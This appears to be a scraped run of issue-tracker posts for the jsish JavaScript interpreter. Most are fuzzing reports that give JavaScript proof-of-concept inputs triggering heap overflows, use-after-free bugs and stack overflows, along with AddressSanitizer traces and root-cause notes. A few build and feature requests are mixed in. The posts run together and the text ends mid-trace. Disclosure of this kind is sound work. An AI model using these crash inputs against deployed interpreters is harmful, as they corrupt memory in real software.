#15 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#16 0x75317f in jsi_evalStrFile src/jsiEval.c:2496
#17 0x499c46 in Jsi_Main src/jsiInterp.c:917
#18 0xc0345a in jsi_main src/main.c:44
#19 0x7fe14f14083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#20 0x434f48 in _start (/home/keven/Fuzzing/jsish-1024/jsish+0x434f48)
0x60b00000a4f2 is located 0 bytes to the right of 98-byte region [0x60b00000a490,0x60b00000a4f2)
allocated by thread T0 here:
#0 0x7fe14fcac602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x49e422 in Jsi_Malloc src/jsiUtils.c:52
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
Shadow bytes around the buggy address:
0x0c167fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff9450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff9460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff9470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c167fff9480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c167fff9490: fa fa 00 00 00 00 00 00 00 00 00 00 00 00[02]fa
0x0c167fff94a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c167fff94b0: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fd fd
0x0c167fff94c0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
0x0c167fff94d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c167fff94e0: fd fd fa fa fa fa fa fa fa fa 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==42992==ABORTING
operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
try {
var __num = 11.001002;
var PyeA = __num.toString(__num);
var ZTZe = __num.toExponential(__num);
var AkBW = __num.toPrecision(~_num);
var tpWc = __num.toExponential(__num);
var MPKY = __num.toExponential(__num);
} catch (ex) {
sputnikException = ex;
}
var successfullyParsed = true;
~ _num as a parameter, that is, precision. _num is an undefined variable, jsish thinks it is 0 by default, then the negation will become 0x7fffffff. In the analysis of the function NumberToPrecisionCmd(src/jsiNumber.c ), Jsi_GetIntFromValue is used to obtain the precision, which is the prec variable. But buf is a buffer on the stack of only 100 bytes. When prec exceeds 100, it causes a buffer overflow.
operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
var o = [
1,
2
];
o.length = -9007199254740991;
o, 90040991;
var ExBs = new RegExp('>l1Pq4Q~R$!');
ExBs = o.reverse();
var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o);
o.length = o.length != o;
o = zaCp.toExponential(o.length);
var FfYD = new RegExp('@OsH');
JSON.stringify('/Z-s#YisGL');
o = o.constructor();
FfYD.lastIndex = -1 <= -2147483647;
o.length = 1e+81 == FfYD.lastIndex;
var yfSi = new Map([
[
1,
1200,
o.length,
ExBs.lastIndex
],
[
o,
ExBs,
o,
0,
-Infinity,
-Infinity
]
]);
var Hjwz = new Map([
[],
[
o,
o,
-1
]
]);
var QkwQ = new RegExp('GBY');
var dPft = new Map([
[
-2147483648,
FfYD.lastIndex,
FfYD,
3037000498,
0.1,
ExBs.length,
FfYD,
2147483649
],
[
ExBs,
FfYD.lastIndex,
-9007199254740994
]
]);
var fjNQ = o.indexOf(0.2, function () {
});
var a = Object.keys(o);
var TdaH = new RegExp('#0CHy=U2|.xg^{;xO');
var APSB = -9007199254740990 != a.length;
var BYaK = new Float32Array([
yfSi,
4,
-4294967295,
FfYD,
zaCp
]);
var wCMe = new WeakSet([]);
In src/jsiObj.c:428, len is the length of the Array, and the PoC is initially set to a maximum value by o.length. After the calculation of the code, nsiz is calculated as a negative number, which can bypass the two checks of line 421 and line 425.
obj-> arr will get a smaller size of heap space, and then memset assigns a value to the space pointed to by obj-> arr + obj-> arrMaxSize, but this time has exceeded the actual heap range of obj-> arr, causing heap overflow .
Ubuntu 16.04
gcc 5.4.0
version: a6fc196
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Target device:
Desktop Linux
Below is the ASAN outputs.
=================================================================
==139448==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000ee30 at pc 0x000000577524 bp 0x7ffcb1fc18d0 sp 0x7ffcb1fc18c0
READ of size 4 at 0x60300000ee30 thread T0
#0 0x577523 in DeleteTreeValue src/jsiObj.c:170
#1 0x595fda in Jsi_TreeEntryDelete src/jsiTree.c:636
#2 0x59ee29 in destroy_node src/jsiTree.c:496
#3 0x59ee29 in destroy_node src/jsiTree.c:494
#4 0x59ee29 in Jsi_TreeDelete src/jsiTree.c:515
#5 0x579387 in Jsi_ObjFree src/jsiObj.c:342
#6 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#7 0x454cf1 in ValueFree src/jsiValue.c:178
#8 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#9 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#10 0x4535ed in jsi_FuncObjFree src/jsiFunc.c:1077
#11 0x5798dc in Jsi_ObjFree src/jsiObj.c:322
#12 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#13 0x454cf1 in ValueFree src/jsiValue.c:178
#14 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#15 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#16 0x524735 in Jsi_OptionsFree src/jsiOptions.c:1383
#17 0x48a1f3 in jsiInterpDelete src/jsiInterp.c:1904
#18 0xc07b3f in jsi_main src/main.c:46
#19 0x7f2eba2e983f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#20 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)
0x60300000ee30 is located 0 bytes inside of 32-byte region [0x60300000ee30,0x60300000ee50)
freed by thread T0 here:
#0 0x7f2ebae552ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here:
#0 0x7f2ebae5579a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x49f5a4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:170 DeleteTreeValue
Shadow bytes around the buggy address:
0x0c067fff9d70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff9d80: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff9d90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff9da0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff9db0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
=>0x0c067fff9dc0: fd fd fd fd fa fa[fd]fd fd fd fa fa fd fd fd fd
0x0c067fff9dd0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa 00 00
0x0c067fff9de0: 00 00 fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff9df0: fd fd fd fa fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==139448==ABORTING
I have installed libmysqlclient-dev package on my Ubuntu 20.04. Yet, make reports an error:
src/jsiMySql.c:30:10: fatal error: mysql/my_config.h: No such file or directory
30 | #include <mysql/my_config.h>
There is no my_config.h in /usr/include/mysql/ folder. My version of libmysqlclient-dev is 8.0.19-0ubuntu5
I would like to be able to use a fossil repository features when using a fossil archive, as out of the box user generated CMS capabilties. Essentially issues, wiki, chat & forums - as they can be used to capture feedback that can synchronized and fed back to the developer, or allow me to use jsish to glue-code fossil features to external issue trackers/3rd party tools etc.
When the Jsi_Realloc function of jsiUtils.c uses realloc to expand the memory of a dynamic array, if the requested size is larger than the original size, the new memory from realloc will not be initialized (cleared), causing memory leaks.
Commit: 9fa798e
Version: v3.5.0
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
export CFLAGS='-fsanitize=address'
makevar JSEtest = [
'aa',
'bb',
'hhh'
];
try { Number.bind(console.input('listNum' + JSEtest), 4)(); } catch (e) {};
try { (1 >> y).toFixed.bind(2, 4)(); } catch (e) {};
(1 >> y).toFixed.bind(2, 4)();
$ ./jsish/jsish poc.js
listNum [object Object]
/home/user/poc.js:10: error: apply Number.toFixed to a non-number object
ERROR:
=================================================================
ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1 byte(s) in 1 object(s) allocated from:
#0 0x7f0e5412d538 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x77538)
#1 0x56523c6594ad in linenoise src/linenoise.c:1061
SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s).Credits: Found by OWL337 team.
Hi,
I like your project here, do you plan to do a binary release for all major platforms? A tool like https://repology.org/ would help target all linux distros.
D:\TEMP>jsish -S test.db
CALL BACKTRACE:
#1: SqliteUI.jsi:665: in moduleRun( "D:test.db" )
#2: SqliteUI.jsi:662: in SqliteUI( [ "D:test.db" ], {} )
#3: SqliteUI.jsi:634: in main()
SqliteUI.jsi:634: error: db open failed: \Users\username/.sqliteui.db (c-extn [Sqlite])
ERROR:
operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
var o = [
1,
2
];
o.length = ~-2147483648;
o = o.reverse();
var a = Object.keys(o);
var pJZc = JSON.stringify('gA6MJqj19J?*JEEN');
pJZc = pJZc.slice(pJZc.length, pJZc.length);
pJZc = o.filter(function () {
}, 3037000498);
var GRPm = new RegExp('');
var NXPj = new RegExp('_IÁ\x80\xA7\t\x07ñ\xBB=MÙ%ÿ');
GRPm = o.indexOf(2147483647, function () {
});
JSON.stringify('Rmt(3oS<C?]+^J*uH0pR]');
o = a.slice(o, o);
var DYsj = new SharedArrayBuffer(2147483647);
var KweA = new Map([
[
0,
1,
o,
673720360,
o,
a,
o.length
],
[
a.length,
42,
a,
-2147483648,
a.length,
-Infinity,
o,
1e-15
]
]);
var JXpp = JSON.stringify('\xA6\xB8løÚz\x1Cz\x81\x83ó\x9D;\xA9!ð\x8F\x87\xB3nZ');
var NRrA;
NRrA = o.toString(o);
The code that caused the vulnerability is on line src / jsiArray.c: 464, the function jsi_ArrayFilterCmd, the code is as follows:
curlen is obtained by reading the length of the object obj, as shown in the figure:
Modify the length of obj in PoC to a larger value, ie:
Then call the o.filter function to trigger jsish's jsi_ArrayFilterCmd function, and then make the curlen value larger, and access the heap space after the obj-> arr array is crossed.
It looks like jsish is failing to check/enforce some of the basic string limits, and crashes instead of erroring out.
var s = 'abcdefghijklmnopqrstuvwxyz';
try { s.repeat(9999999);
} catch(e) { puts('repeat fail', e); }
while (true)
s += s;
operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
var o = [
1,
2
];
o, 90040991;
var ExBs = new RegExp('>l1Pq4Q~R$!');
ExBs = o.reverse();
ExBs.length = ~3037000498;
var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o);
var FfYD = new RegExp('@OsH');
o = o.constructor();
var yfSi = new Map([
[
1,
1200,
o.length,
ExBs.lastIndex
],
[
o,
ExBs,
o,
0,
-Infinity,
-Infinity
]
]);
var YAjm = yfSi.keys();
var QkwQ = new RegExp('GBY');
var dPft = new Map([
[
-2147483648,
FfYD.lastIndex,
FfYD,
3037000498,
0.1,
ExBs.length,
FfYD,
2147483649
],
[
ExBs,
FfYD.lastIndex,
-9007199254740994
]
]);
var fjNQ = o.indexOf(0.2, function () {
});
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;
var wCMe = new WeakSet([]);
The code that generated the vulnerability is on line src / jsiObj.c: 428, the code is as follows:
lenis the length of the Array, and the PoC is initially set to a maximum value by o.length. After the calculation of the code, nsiz is calculated as a negative number, which can bypass the two checks of line 421 and line 425.
The affected code is as follows:
obj-> arr will get a smaller size of heap space, and then memset assigns a value to the space pointed to by obj-> arr + obj-> arrMaxSize, but this time has exceeded the actual heap range of obj-> arr, causing heap overflow .
When jsi_DecrRefCount calls the jsi_freeValueEntry function, it incorrectly references the heap block that has been freed by jsi_freeValueEntry (src/jsiInterp.c:643), causing the Use After Free vulnerability
Ubuntu 16.04 x86_64
gcc version 6.5.0 20181026
backtrace
//...
Program received signal SIGABRT
// ...
#4 0x00000000004249e1 in jsi_freeValueEntry (interp=0x83d010, hPtr=0x8ce930, ptr=0x8cd110) at src/jsiInterp.c:643
#5 0x000000000044c446 in Jsi_HashClear (tablePtr=0x849350) at src/jsiHash.c:507
#6 0x000000000044c53b in Jsi_HashDelete (tablePtr=0x849350) at src/jsiHash.c:526
#7 0x0000000000429975 in jsiInterpDelete (interp=0x83d010, unused=0x83d010) at src/jsiInterp.c:1849
#8 0x000000000042a3fd in Jsi_EventuallyFree (interp=0x83d010, data=0x83d010, proc=0x4291ec <jsiInterpDelete>) at src/jsiInterp.c:1987
#9 0x000000000042a19a in Jsi_InterpDelete (interp=0x83d010) at src/jsiInterp.c:1941
#10 0x000000000059ad50 in jsi_main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:46
#11 0x000000000059ad9f in main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:52Is it possible to add unicode to write code not only in Latin ?
Note, older support content for Jsi is here:
Ubuntu 16.04
gcc 5.4.0
version: a6fc196
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Desktop Linux
Below is the ASAN outputs.
operating system: ubuntu18.04
compile command: export JSI__SANITIZE=1 && make
test command: ./jsish poc
var arr = [
{
a: 1,
b: 2
},
{
a: 1,
b: 2
},
{
a: 1,
b: 2
}
];
arr.length = ~arr;
arr.unshift(-9007199254740991, 153, 10000, 1e+81);
ASAN outputs the following error. It seems that it is operating Jsi_ObjArraySizer, which causes negative values to be passed into realloc. For correct operation, abnormal parameters should be detected.
=================================================================
==91080==ERROR: AddressSanitizer: negative-size-param: (size=-8)
#0 0x7f47518aa05d in __asan_memmove (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8d05d)
#1 0x483c77 in jsi_ArrayUnshiftCmd src/jsiArray.c:816
#2 0x59e6a6 in jsi_FunctionSubCall src/jsiEval.c:855
#3 0x59f349 in jsiEvalFunction src/jsiEval.c:916
#4 0x5a3e0c in jsi_evalcode_sub src/jsiEval.c:1306
#5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
#6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
#7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
#8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
#9 0x6996e9 in jsi_main src/main.c:44
#10 0x6997d4 in main src/main.c:52
#11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#12 0x414cb8 in _start (/home/node/xjsish/jsish+0x414cb8)
0x60c000015940 is located 0 bytes inside of 128-byte region [0x60c000015940,0x60c0000159c0)
allocated by thread T0 here:
#0 0x7f47518b5961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961)
#1 0x44ecd9 in Jsi_Realloc src/jsiUtils.c:47
#2 0x4d16ea in Jsi_ObjArraySizer src/jsiObj.c:427
#3 0x4d182f in Jsi_ObjNewArray src/jsiObj.c:441
#4 0x5b00ca in jsi_evalcode_sub src/jsiEval.c:1914
#5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
#6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
#7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
#8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
#9 0x6996e9 in jsi_main src/main.c:44
#10 0x6997d4 in main src/main.c:52
#11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memmove
==91080==ABORTING
```
Ubuntu 16.04
gcc 5.4.0
version: 73f457f
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Below is the ASAN outputs.
=================================================================
==2511==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000ce56 at pc 0x0000004e8763 bp 0x7fff6dd3ff40 sp 0x7fff6dd3ff30
READ of size 1 at 0x60d00000ce56 thread T0
#0 0x4e8762 in jsi_utf_tocase src/jsiString.c:396
#1 0x4e951f in StringToLowerCaseCmd src/jsiString.c:432
#2 0x4c405d in jsi_FuncCallSub src/jsiProto.c:244
#3 0x73eaa4 in jsiFunctionSubCall src/jsiEval.c:790
#4 0x73eaa4 in jsiEvalFunction src/jsiEval.c:825
#5 0x73eaa4 in jsiEvalCodeSub src/jsiEval.c:1250
#6 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#7 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#8 0x73e7ca in jsiFunctionSubCall src/jsiEval.c:790
#9 0x73e7ca in jsiEvalFunction src/jsiEval.c:825
#10 0x73e7ca in jsiEvalCodeSub src/jsiEval.c:1250
#11 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#12 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#13 0x73e7ca in jsiFunctionSubCall src/jsiEval.c:790
#14 0x73e7ca in jsiEvalFunction src/jsiEval.c:825
#15 0x73e7ca in jsiEvalCodeSub src/jsiEval.c:1250
#16 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#17 0x75317f in jsi_evalStrFile src/jsiEval.c:2496
#18 0x499c46 in Jsi_Main src/jsiInterp.c:917
#19 0xc0345a in jsi_main src/main.c:44
#20 0x7f78c529883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#21 0x434f48 in _start (/home/keven/Fuzzing/jsish-1024/jsish+0x434f48)
0x60d00000ce56 is located 0 bytes to the right of 134-byte region [0x60d00000cdd0,0x60d00000ce56)
allocated by thread T0 here:
#0 0x7f78c5e04602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x49e422 in Jsi_Malloc src/jsiUtils.c:52
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiString.c:396 jsi_utf_tocase
Shadow bytes around the buggy address:
0x0c1a7fff9970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff9980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff9990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff99a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff99b0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
=>0x0c1a7fff99c0: 00 00 00 00 00 00 00 00 00 00[06]fa fa fa fa fa
0x0c1a7fff99d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1a7fff99e0: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 00 00
0x0c1a7fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 fa
0x0c1a7fff9a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff9a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==2511==ABORTING
Ubuntu 16.04
gcc 5.4.0
version: 17c32ef
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Below is the ASAN outputs.
==62343==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000016968 at pc 0x00000057992e bp 0x7ffc089887e0 sp 0x7ffc089887d0
READ of size 4 at 0x608000016968 thread T0
#0 0x57992d in Jsi_ObjFree src/jsiObj.c:333
#1 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#2 0x454cf1 in ValueFree src/jsiValue.c:178
#3 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#4 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#5 0x5774f7 in DeleteTreeValue src/jsiObj.c:171
#6 0x595fda in Jsi_TreeEntryDelete src/jsiTree.c:636
#7 0x59ee73 in destroy_node src/jsiTree.c:496
#8 0x59ee73 in Jsi_TreeDelete src/jsiTree.c:515
#9 0x579387 in Jsi_ObjFree src/jsiObj.c:342
#10 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#11 0x454cf1 in ValueFree src/jsiValue.c:178
#12 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#13 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#14 0x524735 in Jsi_OptionsFree src/jsiOptions.c:1383
#15 0x48a1f3 in jsiInterpDelete src/jsiInterp.c:1904
#16 0xc07b3f in jsi_main src/main.c:46
#17 0x7f17635b783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#18 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)
0x608000016968 is located 72 bytes inside of 96-byte region [0x608000016920,0x608000016980)
freed by thread T0 here:
#0 0x7f17641232ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x478483 in regExpFree src/jsiInterp.c:585
previously allocated by thread T0 here:
#0 0x7f176412379a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x49f5a4 in Jsi_Calloc src/jsiUtils.c:57
#2 0xca03b7 (/home/keven/Fuzzing/jsish-1021/jsish+0xca03b7)
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:333 Jsi_ObjFree
Shadow bytes around the buggy address:
0x0c107fffacd0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107ffface0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffacf0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad00: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad10: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c107fffad20: fa fa fa fa fd fd fd fd fd fd fd fd fd[fd]fd fd
0x0c107fffad30: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c107fffad40: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad60: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad70: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==62343==ABORTING
Ubuntu 16.04
gcc 5.4.0
version: a6fc196
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Desktop Linux
Below is the ASAN outputs.
operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
var o = [
1,
2
];
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
o = o.toString(o.length);
var a = Object.keys(o);
var YzNz = new RegExp('kf}(Vq)XW8St');
o.length = -o.length;
o.length = 5e-324 >= 9007199254740992;
o.length = o == 1.3;
a.length = -9007199254740990;
o.length = a.length > o;
var FpXa = new RegExp('\fÇ\xAF\x8F\x93A\xAFuQ=ºC\x99e\xACCýæÜ47\x18');
var APSB = -9007199254740990 != a.length;
APSB = a.slice(a.length, a.length);
var ZDnB = a.map(function () {
}, function () {
});
The vulnerability code is in line src / jsiArray.c + 414, the function jsi_ArrayMapCmd, the vulnerability code is as follows:
The curlen here is also the size of the array, and can be arbitrarily set in the js code, for example in the poc
The affected code is in the analytic function Jsi_ObjSetLength, as shown in the figure:
The actual array size len is larger than obj-> arrMaxSize, which triggers the assert.
Commit: 9fa798e
Version: v3.5.0
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
export CFLAGS='-fsanitize=address'
makefunction JSEtest(Function) {
var a = Array.prototype.push.call(a, 42, 43);
}
for (var i = 0; i < 25000; i++) {
JSEtest(Array);
}
$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
=================================================================
==9209==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd05e20e58 (pc 0x7f6abd3fb1e6 bp 0x7ffd05e216f0 sp 0x7ffd05e20e60 T0)
#0 0x7f6abd3fb1e5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)
#1 0x5571122680fd in Jsi_NameLookup src/jsiUtils.c:413
#2 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#3 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#4 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#5 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#6 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#7 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#8 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#9 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
...... ...... ......
...... ...... ......
#246 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#247 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#248 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#249 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#250 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)
==9209==ABORTINGCredits: Found by OWL337 team.
Ubuntu 16.04
gcc 5.4.0
version: 17c32ef
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Below is the ASAN outputs.
=================================================================
==75149==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000014048 at pc 0x0000004ff1ab bp 0x7ffc17dbe420 sp 0x7ffc17dbe410
READ of size 8 at 0x608000014048 thread T0
#0 0x4ff1aa in jsi_ArrayReduceSubCmd src/jsiArray.c:620
#1 0x4ff1aa in jsi_ArrayReduceRightCmd src/jsiArray.c:662
#2 0x4c4f20 in jsi_FuncCallSub src/jsiProto.c:244
#3 0x73e470 in jsiFunctionSubCall src/jsiEval.c:793
#4 0x73e470 in jsiEvalFunction src/jsiEval.c:828
#5 0x73e470 in jsiEvalCodeSub src/jsiEval.c:1253
#6 0x7509a7 in jsi_evalcode src/jsiEval.c:2188
#7 0x7534fb in jsi_evalStrFile src/jsiEval.c:2494
#8 0x49ae7e in Jsi_Main src/jsiInterp.c:917
#9 0xc07b32 in jsi_main src/main.c:44
#10 0x7f9608aca83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#11 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)
0x608000014048 is located 40 bytes inside of 96-byte region [0x608000014020,0x608000014080)
freed by thread T0 here:
#0 0x7f96096362ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
previously allocated by thread T0 here:
#0 0x7f960963679a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x49f5a4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:620 jsi_ArrayReduceSubCmd
Shadow bytes around the buggy address:
0x0c107fffa7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fffa7c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa7d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fffa7e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fffa7f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c107fffa800: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd
